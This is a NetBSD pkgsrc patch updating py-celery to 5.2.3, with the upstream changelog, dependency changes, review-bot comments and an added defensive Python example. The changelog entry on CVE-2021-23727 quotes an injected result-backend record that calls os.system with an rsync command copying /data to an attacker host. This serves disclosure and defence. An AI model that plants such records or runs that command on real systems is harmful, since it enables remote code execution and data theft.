From 6e820eb0e3a48b5d8f5550e8e779d08866c774da Mon Sep 17 00:00:00 2001 
From: wiz
Date: Tue, 15 Feb 2022 16:24:56 +0000
Subject: [PATCH] py-celery: update to 5.2.3.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

5.2.3
=====

- Allow redis >= 4.0.2.
- Upgrade minimum required pymongo version to 3.11.1.
- tested pypy3.8 beta (#6998).
- Split Signature.__or__ into subclasses' __or__ (#7135).
- Prevent duplication in event loop on Consumer restart.
- Restrict setuptools>=59.1.1,<59.7.0.
- Kombu bumped to v5.2.3
- py-amqp bumped to v5.0.9
- Some docs & CI improvements.

5.2.2
=====

- Various documentation fixes.
- Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

  When a task fails, the failure information is serialized in the backend.
  In some cases, the exception class is only importable from the
  consumer's code base. In this case, we reconstruct the exception class
  so that we can re-raise the error on the process which queried the
  task's result.
  This was introduced in #4836.

  If the recreated exception type isn't an exception, this is a security issue.
  Without the condition included in this patch, an attacker could inject a
  remote code execution instruction such as:
  ``os.system("rsync /data attacker@192.168.56.100:~/data")``
  by setting the task's result to a failure in the result backend with the os,
  the system function as the exception type and the payload
  ``rsync /data attacker@192.168.56.100:~/data`` as the exception arguments
  like so:

  .. code-block:: python

      {
        "exc_module": "os",
        'exc_type': "system",
        "exc_message": "rsync /data attacker@192.168.56.100:~/data"
      }

  According to my analysis, this vulnerability can only be exploited if
  the producer delayed a task which runs long enough for the attacker to
  change the result mid-flight, and the producer has polled for the
  task's result.
  The attacker would also have to gain access to the result backend.

  The severity of this security vulnerability is low, but we still
  recommend upgrading.
5.2.1
=====

- Fix rstrip usage on bytes instance in ProxyLogger.
- Pass logfile to ExecStop in celery.service example systemd file.
- fix: reduce latency of AsyncResult.get under gevent (#7052)
- Limit redis version: <4.0.0.
- Bump min kombu version to 5.2.2.
- Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.
- Remove dependency to case (#7077).
- fix: task expiration is timezone aware if needed (#7065).
- Initial testing of pypy-3.8 beta to CI.
- Docs, CI & tests cleanups.

5.2.0
=====

- Prevent from subscribing to empty channels (#7040)
- fix register_task method.
- Fire task failure signal on final reject (#6980)
- Limit pymongo version: <3.12.1 (#7041)
- Bump min kombu version to 5.2.1

5.2.0rc2
========

- Bump Python 3.10.0 to rc2.
- [pre-commit.ci] pre-commit autoupdate (#6972).
- autopep8.
- Prevent worker to send expired revoked items upon hello command (#6975).
- docs: clarify the 'keeping results' section (#6979).
- Update deprecated task module removal in 5.0 documentation (#6981).
- [pre-commit.ci] pre-commit autoupdate.
- try python 3.10 GA.
- mention python 3.10 on readme.
- Documenting the default consumer_timeout value for rabbitmq >= 3.8.15.
- Azure blockblob backend parametrized connection/read timeouts (#6978).
- Add as_uri method to azure block blob backend.
- Add possibility to override backend implementation with celeryconfig (#6879).
- [pre-commit.ci] pre-commit autoupdate.
- try to fix deprecation warning.
- [pre-commit.ci] pre-commit autoupdate.
- not needed anymore.
- not needed anymore.
- not used anymore.
- add github discussions forum

5.2.0rc1
========

- Kill all workers when main process exits in prefork model (#6942).
- test kombu 5.2.0rc1 (#6947).
- try moto 2.2.x (#6948).
- Prepared Hacker News Post on Release Action.
- update setup with python 3.7 as minimum.
- update kombu on setupcfg.
- Added note about automatic killing all child processes of worker after its termination.
- [pre-commit.ci] pre-commit autoupdate.
- Move importskip before greenlet import (#6956).
- amqp: send expiration field to broker if requested by user (#6957).
- Single line drift warning.
- canvas: fix kwargs argument to prevent recursion (#6810) (#6959).
- Allow to enable Events with app.conf mechanism.
- Warn when expiration date is in the past.
- Add the Framework :: Celery trove classifier.
- Give indication whether the task is replacing another (#6916).
- Make setup.py executable.
- Bump version: 5.2.0b3 → 5.2.0rc1.

5.2.0b3
=======

- Add args to LOG_RECEIVED (fixes #6885) (#6898).
- Terminate job implementation for eventlet concurrency backend (#6917).
- Add cleanup implementation to filesystem backend (#6919).
- [pre-commit.ci] pre-commit autoupdate (#69).
- Add before_start hook (fixes #4110) (#6923).
- Restart consumer if connection drops (#6930).
- Remove outdated optimization documentation (#6933).
- added https verification check functionality in arangodb backend (#6800).
- Drop Python 3.6 support.
- update supported python versions on readme.
- [pre-commit.ci] pre-commit autoupdate (#6935).
- Remove appveyor configuration since we migrated to GA.
- pyupgrade is now set to upgrade code to 3.7.
- Drop exclude statement since we no longer test with pypy-3.6.
- 3.10 is not GA so it's not supported yet.
- Celery 5.1 or earlier supports Python 3.6.
- Fix linting error.
- fix: Pass a Context when chaining fail results (#6899).
- Bump version: 5.2.0b2 → 5.2.0b3.

5.2.0b2
=======

- Test windows on py3.10rc1 and pypy3.7 (#6868).
- Route chord_unlock task to the same queue as chord body (#6896).
- Add message properties to app.tasks.Context (#6818).
- handle already converted LogLevel and JSON (#6915).
- 5.2 is codenamed dawn-chorus.
- Bump version: 5.2.0b1 → 5.2.0b2.

5.2.0b1
=======

- Add Python 3.10 support (#6807).
- Fix docstring for Signal.send to match code (#6835).
- No blank line in log output (#6838).
- Chords get body_type independently to handle cases where body.type does not exist (#6847).
- Fix #6844 by allowing safe queries via app.inspect().active() (#6849). - Fix multithreaded backend usage (#6851). - Fix Open Collective donate button (#6848). - Fix setting worker concurrency option after signal (#6853). - Make ResultSet.on_ready promise hold a weakref to self (#6784). - Update configuration.rst. - Discard jobs on flush if synack isn't enabled (#6863). - Bump click version to 8.0 (#6861). - Amend IRC network link to Libera (#6837). - Import celery lazily in pytest plugin and unignore flake8 F821, "undefined name '...'" (#6872). - Fix inspect --json output to return valid json without --quiet. - Remove celery.task references in modules, docs (#6869). - The Consul backend must correctly associate requests and responses (#6823). --- net/py-celery/Makefile | 32 +++++++++++++------ net/py-celery/distinfo | 10 +++--- .../patches/patch-requirements_default.txt | 21 ++++++++++++ .../patches/patch-requirements_test.txt | 16 ++++++++++ 4 files changed, 65 insertions(+), 14 deletions(-) create mode 100644 net/py-celery/patches/patch-requirements_default.txt create mode 100644 net/py-celery/patches/patch-requirements_test.txt diff --git a/net/py-celery/Makefile b/net/py-celery/Makefile index ea758880873d..a337f1e129e4 100644 --- a/net/py-celery/Makefile +++ b/net/py-celery/Makefile @@ -1,8 +1,7 @@ -# $NetBSD: Makefile,v 1.22 2022/01/05 15:41:16 wiz Exp $ +# $NetBSD: Makefile,v 1.23 2022/02/15 16:24:56 wiz Exp $ -DISTNAME= celery-5.1.2 +DISTNAME= celery-5.2.3 PKGNAME= ${PYPKGPREFIX}-${DISTNAME} -PKGREVISION= 2 CATEGORIES= net python MASTER_SITES= ${MASTER_SITE_PYPI:=c/celery/} 
@@ -11,16 +10,26 @@ HOMEPAGE= https://docs.celeryproject.org/ COMMENT= Asynchronous task/job queue based on distributed message passing LICENSE= modified-bsd -DEPENDS+= ${PYPKGPREFIX}-billiard>=3.6.3.0:../../parallel/py-billiard -DEPENDS+= ${PYPKGPREFIX}-click>=7.0:../../devel/py-click +DEPENDS+= ${PYPKGPREFIX}-billiard>=3.6.4.0:../../parallel/py-billiard +DEPENDS+= ${PYPKGPREFIX}-click>=8.0.3:../../devel/py-click DEPENDS+= ${PYPKGPREFIX}-click-didyoumean>=0.0.3:../../devel/py-click-didyoumean DEPENDS+= ${PYPKGPREFIX}-click-plugins>=1.1.1:../../devel/py-click-plugins -DEPENDS+= ${PYPKGPREFIX}-click-repl>=0.1.6:../../devel/py-click-repl -DEPENDS+= ${PYPKGPREFIX}-kombu>=5.0.0:../../net/py-kombu -DEPENDS+= ${PYPKGPREFIX}-pytz-[0-9]*:../../time/py-pytz +DEPENDS+= ${PYPKGPREFIX}-click-repl>=0.2.0:../../devel/py-click-repl +DEPENDS+= ${PYPKGPREFIX}-kombu>=5.2.3:../../net/py-kombu +DEPENDS+= ${PYPKGPREFIX}-pytz>=2021.3:../../time/py-pytz +DEPENDS+= ${PYPKGPREFIX}-setuptools>=59.1.1:../../devel/py-setuptools DEPENDS+= ${PYPKGPREFIX}-vine>=5.0.0:../../devel/py-vine -TEST_DEPENDS+= ${PYPKGPREFIX}-case>=1.3.1:../../devel/py-case -TEST_DEPENDS+= ${PYPKGPREFIX}-test>=6.0:../../devel/py-test +TEST_DEPENDS+= ${PYPKGPREFIX}-boto3>=1.9.178:../../net/py-boto3 +TEST_DEPENDS+= ${PYPKGPREFIX}-moto>=2.2.6:../../net/py-moto +TEST_DEPENDS+= ${PYPKGPREFIX}-msgpack-[0-9]*:../../devel/py-msgpack +#TEST_DEPENDS+= ${PYPKGPREFIX}-pre-commit-[0-9]*:../../wip/py-pre-commit +TEST_DEPENDS+= ${PYPKGPREFIX}-test>=6.2:../../devel/py-test +TEST_DEPENDS+= ${PYPKGPREFIX}-test-celery-[0-9]*:../../devel/py-test-celery +TEST_DEPENDS+= ${PYPKGPREFIX}-test-subtests-[0-9]*:../../devel/py-test-subtests +TEST_DEPENDS+= ${PYPKGPREFIX}-test-timeout-[0-9]*:../../devel/py-test-timeout +# unlisted but needed +TEST_DEPENDS+= ${PYPKGPREFIX}-dns-[0-9]*:../../net/py-dns +TEST_DEPENDS+= ${PYPKGPREFIX}-mongo-[0-9]*:../../databases/py-mongo USE_LANGUAGES= # none 
@@ -32,5 +41,8 @@ post-install: cd ${DESTDIR}${PREFIX}/bin && \ ${MV} celery celery-${PYVERSSUFFIX} || ${TRUE} +# test status as of 5.2.3 with py-pre-commit +# 1 failed, 2444 passed, 49 skipped, 3 xfailed, 30 warnings + .include "../../lang/python/egg.mk" .include "../../mk/bsd.pkg.mk" diff --git a/net/py-celery/distinfo b/net/py-celery/distinfo index 2e8bb79eee95..4ff99eba855b 100644 --- a/net/py-celery/distinfo +++ b/net/py-celery/distinfo @@ -1,5 +1,7 @@ -$NetBSD: distinfo,v 1.15 2021/10/26 11:06:35 nia Exp $ +$NetBSD: distinfo,v 1.16 2022/02/15 16:24:56 wiz Exp $ -BLAKE2s (celery-5.1.2.tar.gz) = 76e9de1de9188c50b411bda429ddc0296220b4d67c74fd12a6b96a2d0b7bfa68 -SHA512 (celery-5.1.2.tar.gz) = c8f8d8dd4cc23a62ed3eea9b5388865993aee940730d4c672ae24c1b017466b0de6f422c7cb3b1bb2a4e33459a0d2447f9a42e59ee949fda56f3032298402a71 -Size (celery-5.1.2.tar.gz) = 1457540 bytes +BLAKE2s (celery-5.2.3.tar.gz) = 7b69810bf388b118033cc909a0d6f79a4c37c0d5493eb70febdcd28bacce6098 +SHA512 (celery-5.2.3.tar.gz) = 9df7535b9a1e0120fe87f11f054c821e5f806b60833bda7dd37b850a3080b88798edfbeec1edcfb58aecc9c34406a32112f3e952e25cee3e5e79ae2f57ce0071 +Size (celery-5.2.3.tar.gz) = 1472455 bytes +SHA1 (patch-requirements_default.txt) = a878a8bbd3ecc6e305cbcb7c8de2777ab0da1697 +SHA1 (patch-requirements_test.txt) = 7ef7e9a6a72fc19b547d073f9d9bf327959412a7 diff --git a/net/py-celery/patches/patch-requirements_default.txt b/net/py-celery/patches/patch-requirements_default.txt new file mode 100644 index 000000000000..8ae963424e91 --- /dev/null +++ b/net/py-celery/patches/patch-requirements_default.txt 
@@ -0,0 +1,21 @@ +$NetBSD: patch-requirements_default.txt,v 1.1 2022/02/15 16:24:57 wiz Exp $ + +Relax restrictions. + +--- requirements/default.txt.orig 2021-12-29 05:23:30.000000000 +0000 ++++ requirements/default.txt +@@ -1,9 +1,9 @@ + pytz>=2021.3 +-billiard>=3.6.4.0,<4.0 +-kombu>=5.2.3,<6.0 +-vine>=5.0.0,<6.0 +-click>=8.0.3,<9.0 ++billiard>=3.6.4.0 ++kombu>=5.2.3 ++vine>=5.0.0 ++click>=8.0.3 + click-didyoumean>=0.0.3 + click-repl>=0.2.0 + click-plugins>=1.1.1 +-setuptools>=59.1.1,<59.7.0 ++setuptools>=59.1.1 diff --git a/net/py-celery/patches/patch-requirements_test.txt b/net/py-celery/patches/patch-requirements_test.txt new file mode 100644 index 000000000000..2280d599af4d --- /dev/null +++ b/net/py-celery/patches/patch-requirements_test.txt @@ -0,0 +1,16 @@ +$NetBSD: patch-requirements_test.txt,v 1.4 2022/02/15 16:24:57 wiz Exp $ + +Relax restrictions. + +--- requirements/test.txt.orig 2021-11-21 13:37:38.000000000 +0000 ++++ requirements/test.txt +@@ -1,7 +1,7 @@ +-pytest~=6.2 ++pytest + pytest-celery + pytest-subtests +-pytest-timeout~=1.4.2 ++pytest-timeout + boto3>=1.9.178 + moto>=2.2.6 + pre-commit
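Review bot: The test-status comment added in the Makefile post-install hunk (`# 1 failed, 2444 passed, 49 skipped, 3 xfailed, 30 warnings`) records a failure without naming the failing test, so the next updater cannot tell a known failure from a regression; put the test name (or an upstream issue reference) next to the count. The same comment says the run was done "with py-pre-commit" while the matching `TEST_DEPENDS+= ${PYPKGPREFIX}-pre-commit-[0-9]*:../../wip/py-pre-commit` line in the dependency hunk is commented out; one more clause stating that pre-commit was installed from pkgsrc-wip by hand would reconcile the two.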
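Review bot: `patch-requirements_default.txt` removes the `setuptools>=59.1.1,<59.7.0` upper bound that the 5.2.3 changelog in this very commit lists as a deliberate upstream restriction ("Restrict setuptools>=59.1.1,<59.7.0."), yet the patch header only says `Relax restrictions.`; add a sentence giving the reason the cap is safe to drop here (the package now depends on whatever single `${PYPKGPREFIX}-setuptools>=59.1.1` pkgsrc provides, so the upper pin cannot be honoured anyway) and, if known, the upstream issue behind the cap, so a later updater can decide whether the patch is still needed when upstream moves the pin.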
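Review bot: `patch-requirements_test.txt` is introduced with `new file mode 100644`, but its RCS keyword already reads `$NetBSD: patch-requirements_test.txt,v 1.4 2022/02/15 16:24:57 wiz Exp $`, while the sibling new patch carries `v 1.1`; if this file is being resurrected from the CVS Attic the revision is expected, otherwise the line should be a bare `$NetBSD$` so CVS expands it on commit.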
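The CVE-2021-23727 entry in the commit message above describes the root cause: an exception class is rebuilt from the `exc_module` and `exc_type` fields stored in the result backend, and before the fix nothing checked that the object found was actually an exception class. The block below is an added example, not Celery's code and not part of this pkgsrc patch; it shows a reconstructor carrying the kind of condition the fix introduces, exercised on constructed records: a benign failure is rebuilt, a record naming `os.system` is refused without the callable ever being invoked, and a class that cannot be imported on this side degrades to a generic `Exception`. The names `rebuild_exception`, `is_accepted` and `UnsafeExceptionType` are assumptions for this example, not Celery's API.

```python
"""Hardened reconstruction of a serialized task failure.

Added example (not Celery's own code): demonstrates the type check that the
CVE-2021-23727 fix described in the 5.2.2 changelog adds.  Record field names
follow the dict quoted in the commit message; function and class names are
assumptions for this example only.
"""
import importlib
from typing import Any, Dict


class UnsafeExceptionType(Exception):
    """Raised when a stored failure names something that is not an exception class."""


def rebuild_exception(failure: Dict[str, Any]) -> BaseException:
    """Turn a stored failure record back into an exception instance.

    The record format mirrors the dict in the changelog:
    {"exc_module": ..., "exc_type": ..., "exc_message": ...}.
    """
    module_name = failure.get("exc_module", "builtins")
    type_name = failure["exc_type"]
    message = failure.get("exc_message", "")

    try:
        module = importlib.import_module(module_name)
        candidate = getattr(module, type_name)
    except (ImportError, AttributeError):
        # The class only exists on the consumer side: keep the information
        # as text instead of guessing at a type.
        return Exception(f"{module_name}.{type_name}: {message}")

    # The condition the fix adds: only real exception classes may be
    # instantiated from backend-controlled data.  Without it, a record naming
    # e.g. os.system would call that function with the stored message.
    if not (isinstance(candidate, type) and issubclass(candidate, BaseException)):
        raise UnsafeExceptionType(
            f"{module_name}.{type_name} is not an exception class; refusing to instantiate"
        )

    return candidate(message)


def is_accepted(failure: Dict[str, Any]) -> bool:
    """Return True if the record rebuilds, False if the type check rejects it."""
    try:
        rebuild_exception(failure)
    except UnsafeExceptionType:
        return False
    return True


# Constructed sample records for this example (not real backend data).
BENIGN = {"exc_module": "builtins", "exc_type": "KeyError", "exc_message": "missing key"}
HOSTILE = {"exc_module": "os", "exc_type": "system", "exc_message": "constructed payload"}
UNKNOWN = {"exc_module": "myapp.errors", "exc_type": "QuotaExceeded", "exc_message": "over"}

if __name__ == "__main__":
    print(type(rebuild_exception(BENIGN)).__name__)   # KeyError
    print(is_accepted(HOSTILE))                       # False
    print(type(rebuild_exception(UNKNOWN)).__name__)  # Exception
```

Because the check runs before `candidate(message)` is evaluated, the hostile record never reaches a call; the same guard also rejects ordinary classes such as `builtins.str`, which pass the `isinstance(candidate, type)` half but not the `issubclass(..., BaseException)` half.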